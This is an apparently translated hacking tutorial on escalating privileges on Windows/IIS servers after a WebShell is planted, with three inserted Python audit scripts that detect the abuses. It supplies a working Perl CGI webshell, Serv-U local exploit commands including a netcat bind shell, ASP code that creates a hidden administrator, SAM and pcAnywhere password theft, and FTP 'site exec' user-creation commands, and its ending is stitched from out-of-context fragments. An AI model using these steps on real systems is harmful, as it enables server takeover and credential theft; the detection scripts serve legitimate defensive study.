This article collects techniques and ideas for privilege escalation from many experts.
Once we have a WebShell, the next step is to elevate privileges.
My personal summary is as follows:
1. C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
See whether you can browse to this directory. If you can, that is ideal: download the .CIF file from it, recover the pcAnywhere password, and log in.
PS: cracking tools have already been provided on this site; look for them yourself!
2. C:\Winnt\System32\Config\
Download the SAM from this directory and crack the users' passwords.
Tools for cracking SAM passwords are LC and SAMInside.
3. C:\Documents and Settings\All Users\Start Menu\Programs\
If you can browse here, you can collect a lot of useful information.
You will see many shortcuts; we usually pick the Serv-U one, view its properties locally to learn the install path, and then see whether you can browse there.
Once inside, if you have permission to modify ServUDaemon.ini, add a user with an empty password:
[USER=wekwen|1]
Password=
HomeDir=C:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=D:\|RWAMELCDP
Access1=F:\|RWAMELCDP
SKEYVALUES=
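The Serv-U account above is dangerous for three reasons: an empty password, Maintenance=System (server administrator rights) and execute access on whole drives. As an added defensive check that is not part of the original article, the following Python script parses a ServUDaemon.ini-style file and reports accounts matching that pattern. The INI text is a constructed sample in the layout of a Serv-U 4.x file, not a real capture, and the access-letter meaning (E = execute) is an assumption about the Serv-U rights string.

```python
import re

# Constructed sample in the layout of a Serv-U 4.x ServUDaemon.ini; not a real capture.
# "wekwen" mirrors the dangerous account the text describes; "webasp" is an ordinary one.
SAMPLE_INI = """\
[GLOBAL]
Version=4.1.0.0

[USER=webasp|1]
Password=ab0123456789abcdef0123456789abcdef
HomeDir=D:\\wwwroot
TimeOut=600
Access1=D:\\wwwroot|RL

[USER=wekwen|1]
Password=
HomeDir=C:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access2=D:\\|RWAMELCDP
"""

DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")   # "C:" or "C:\" means a whole drive


def parse_users(text):
    """Return {name: {KEY: [values...]}} for every [USER=name|n] section.
    Values are kept as lists because Serv-U writes one AccessN key per entry
    and a tampered file may repeat keys."""
    users, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            if section.upper().startswith("USER="):
                name = section[5:].split("|", 1)[0].lower()
                current = users.setdefault(name, {})
            else:
                current = None      # [GLOBAL], [DOMAINS] etc. are not audited here
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            current.setdefault(key.strip().upper(), []).append(value.strip())
    return users


def audit_users(users):
    """Return (user, reason) pairs for settings that match the abuse pattern."""
    findings = []
    for name, keys in users.items():
        if any(v == "" for v in keys.get("PASSWORD", [""])):
            findings.append((name, "password missing or empty"))
        if any(v.lower() == "system" for v in keys.get("MAINTENANCE", [])):
            findings.append((name, "Maintenance=System (server administrator rights)"))
        if any(DRIVE_ROOT.match(v) for v in keys.get("HOMEDIR", [])):
            findings.append((name, "home directory is a whole drive"))
        for key, values in keys.items():
            if not key.startswith("ACCESS"):
                continue
            for entry in values:
                path, _, rights = entry.partition("|")
                path = path.strip()
                # Assumption: "E" in the Serv-U rights string grants execute
                if DRIVE_ROOT.match(path) and "E" in rights.upper():
                    findings.append((name, "execute right on whole drive " + path))
    return findings


def audit_text(text):
    return audit_users(parse_users(text))


if __name__ == "__main__":
    for user, reason in audit_text(SAMPLE_INI):
        print(f"{user}: {reason}")
```

Run it against the real ServUDaemon.ini (read the file and pass its text to audit_text) as part of a periodic configuration review; any hit on a production FTP server deserves an explanation in change history.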
4. C:\Winnt\System32\inetsrv\data\
This directory also gives Everyone full control. What we do is upload the privilege-escalation tools there and then execute them.
5. See whether you can browse to the following directories:
C:\PHP: use phpspy.
C:\perl: it is not always this directory (you can also learn the path from a shortcut's properties). A CGI WebShell:
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<html><pre>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</pre></html>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
Save it as a .cgi file and execute it.
If that does not work, try the .pl extension: rename the .cgi file to .pl and submit
http://anyhost/rmd.pl?dir
If "Access denied" is displayed, it means the script runs! Now first upload su.exe (the Serv-U privilege-escalation exploit) to the Perl bin directory, then submit
http://anyhost/rmd.pl?c:/perl/bin/su.exe
It returns:
Serv-U >3.x local exploit by xiaolu
usage: serv-u.exe "command"
example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
It currently runs with IUSR permissions. Submit:
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe C: /E /T /G Everyone:F"
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe D: /E /T /G Everyone:F"
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe E: /E /T /G Everyone:F"
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe F: /E /T /G Everyone:F"
If the following information is returned, it succeeded.
Serv-U> 3.x local exploit by xiaolu
<220 Serv-U FTP Server V5.2 for Winsock Ready ...
> User Localadministrator
<331 User Name Okay, Need Password.
*********************************************************** ****
> Pass #l@ * * @p
<230 user logged in, proced.
*********************************************************** ****
> Site maintenance
*********************************************************** ****
CREATING New Domain ...
<200-DomainID = 2
<220 Domain Settings Saved
*********************************************************** ****
Domain XL: 2 Created
Creating Evil User
<200-user = XL
200 User Settings Saved
*********************************************************** ****
[ ] Now exploiting ...
> User XL
<331 User Name Okay, Need Password.
*********************************************************** ****
> Pass 111111
<230 user logged in, proced.
*********************************************************** ****
[ ] Now Executing: Cacls.exe C: / E / T / g Everyone: f
<220 Domain Deleted
Now Everyone has full control over all partitions.
Next we promote our user to administrator:
http://anyhost/cmd.pl?c:/perl/bin/su.exe "net localgroup administrators IUSR_anyhost /add"
6. If you can successfully run "cscript C:\inetpub\adminscripts\adsutil.vbs get w3svc/InProcessIsapiApps", you can use it to escalate.
It lists the DLLs that run in-process with elevated privilege: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
Add asp.dll to that privileged list.
asp.dll lives at c:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on every machine).
Now we add it: cscript adsutil.vbs set w3svc/InProcessIsapiApps "C:\Winnt\System32\idq.dll" "C:\Winnt\System32\inetsrv\httpext.dll" "C:\Winnt\System32\inetsrv\httpodbc.dll" "C:\Winnt\System32\inetsrv\ssinc.dll" "C:\Winnt\System32\msw3prt.dll" "C:\Winnt\System32\inetsrv\asp.dll"
Use cscript adsutil.vbs get w3svc/InProcessIsapiApps to check that it was added.
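Because an attacker's goal here is to get asp.dll into the in-process list, defenders should compare that list against a known baseline. As an added example that is not part of the original article, the following Python script parses the quoted path lines of adsutil.vbs "get" output and reports anything beyond the five default DLLs the text names. The SAMPLE_OUTPUT text is constructed to resemble the command's output, not a real capture.

```python
import re

# Constructed to resemble "cscript adsutil.vbs get w3svc/InProcessIsapiApps"
# output; not a real capture. The last entry is the tampering the text describes.
SAMPLE_OUTPUT = """\
InProcessIsapiApps              : (LIST) (6 Items)
  "C:\\WINNT\\System32\\idq.dll"
  "C:\\WINNT\\System32\\inetsrv\\httpext.dll"
  "C:\\WINNT\\System32\\inetsrv\\httpodbc.dll"
  "C:\\WINNT\\System32\\inetsrv\\ssinc.dll"
  "C:\\WINNT\\System32\\msw3prt.dll"
  "C:\\WINNT\\System32\\inetsrv\\asp.dll"
"""

# Baseline: the in-process ISAPI DLLs the text above lists (file names only)
BASELINE = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}

QUOTED = re.compile(r'^\s*"([^"]+)"\s*$')   # one quoted path per line


def parse_inprocess_list(text):
    """Extract the quoted DLL paths from adsutil-style output."""
    paths = []
    for line in text.splitlines():
        m = QUOTED.match(line)
        if m:
            paths.append(m.group(1))
    return paths


def basename(path):
    """Case-insensitive file name, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def unexpected_inprocess(paths, baseline=BASELINE):
    """Return every path whose file name is not in the baseline set."""
    return [p for p in paths if basename(p) not in baseline]


if __name__ == "__main__":
    found = parse_inprocess_list(SAMPLE_OUTPUT)
    for p in unexpected_inprocess(found):
        print("not in baseline:", p)
```

Adjust BASELINE to what your own server legitimately runs in-process; the point is that asp.dll (or any other newcomer) shows up as a difference rather than being read past in a long list.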
7. You can also try this code to escalate, although it does not seem to work very well:
<%@ codepage=936 %>
<%
Response.Expires = 0
On Error Resume Next
Session.Timeout = 50
Server.ScriptTimeout = 3000
Set lp = Server.CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set ob = GetObject(oz)
Set oe = GetObject(oz & "/Administrators,group")
Set od = ob.Create("User", "wekwen$")
od.SetPassword "wekwen"   '<----- password
od.SetInfo
Set of = GetObject(oz & "/wekwen$,user")
oe.Add(of.ADsPath)
Response.Write "wekwen$ super account created!"
%>
Use this code to check whether it worked:
<%@ codepage=936 %>
<%
Response.Expires = 0
On Error Resume Next   ' list the accounts in the Administrators group
Set tn = Server.CreateObject("WScript.Network")
Set objGroup = GetObject("WinNT://" & tn.ComputerName & "/Administrators,group")
For Each admin In objGroup.Members
    Response.Write admin.Name & "<br>"
Next
If Err Then
    Response.Write "No, WScript.Network"
End If
%>
8. C:\Program Files\Java Web Start\
If you can get here, the privileges are usually low; you can try a JSP WebShell. I have heard its privileges are low but have not encountered it myself.
9. Finally, if the host is locked down extremely tightly, you can try writing BAT, VBS or other trojans into C:\Documents and Settings\All Users\Start Menu\Programs\Startup.
Then wait until the host restarts, or force it to restart by DDoS, to achieve the escalation.
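Step 9 relies on the all-users Startup folder being writable and on scripts placed there running at the next logon, so the defensive counterpart is to watch that folder. As an added example that is not part of the original article, the following Python script reports whether the folder is writable by the current account and lists every file in it whose extension Windows would execute at logon. The Startup path constant is the assumed Windows 2000/XP default; the demo uses a constructed temporary folder so it runs anywhere.

```python
import os
import tempfile

# Extensions that run from the Startup folder at logon; .bat and .vbs are the ones the text names.
SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh",
               ".exe", ".scr", ".pif", ".com"}

# Assumed default all-users Startup folder on Windows 2000/XP, for reference only
ALL_USERS_STARTUP = r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup"


def audit_startup_dir(path):
    """Return {"writable": bool, "items": [(name, size, mtime), ...]} for the folder.
    "writable" is whether the *current* account could drop a file there;
    "items" lists files whose extension would execute at logon."""
    items = []
    with os.scandir(path) as it:
        for entry in it:
            if not entry.is_file(follow_symlinks=False):
                continue
            ext = os.path.splitext(entry.name)[1].lower()
            if ext in SCRIPT_EXTS:
                st = entry.stat(follow_symlinks=False)
                items.append((entry.name, st.st_size, int(st.st_mtime)))
    return {"writable": os.access(path, os.W_OK), "items": sorted(items)}


def demo():
    """Constructed demo: a temporary folder standing in for the Startup folder,
    holding one benign desktop.ini and two script files."""
    d = tempfile.mkdtemp()
    for name, body in [("desktop.ini", "[.ShellClassInfo]\n"),
                       ("update.bat", "@echo off\n"),
                       ("helper.vbs", "' placeholder\n")]:
        with open(os.path.join(d, name), "w") as f:
            f.write(body)
    return audit_startup_dir(d)


if __name__ == "__main__":
    result = demo()
    print("writable by this account:", result["writable"])
    for name, size, mtime in result["items"]:
        print(f"{name}  {size} bytes  mtime={mtime}")
```

On a real host, call audit_startup_dir(ALL_USERS_STARTUP) under the web server's service account: "writable" being True is itself the finding, and any script file in "items" that is not part of a known deployment should be treated as suspect.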
In summary: find a directory with write and execute permission, upload the escalation tool there, and finally execute it. Three words: "find", "upload", "execute".
The above is my own summary; everyone has many methods, please share them.
User0=WebASP|1|0
SKEYVALUES=
[USER=WebASP|1]
Password=NO7C154C45EDA5D0AABBBC7DD93B0AEB078
HomeDir=C:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYVALUES=
ftp> open IP
Connected to IP.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready...
User (IP:(none)): ID                 // enter the crafted user
331 User name okay, please send complete E-mail address as password.
Password: password                   // its password
230 User logged in, proced.
ftp> cd winnt                        // enter the Win2K winnt directory; on WinXP or Windows Server 2003 it is the Windows directory
250 Directory changed to /winnt
ftp> cd system32                     // enter the system32 directory
250 Directory changed to /winnt/system32
ftp> quote site exec net.exe user name password /add                 // use the system's net.exe to add a user
200 EXEC command successful (TID=33).
ftp> quote site exec net.exe localhost administrators user name /add  // promote to super user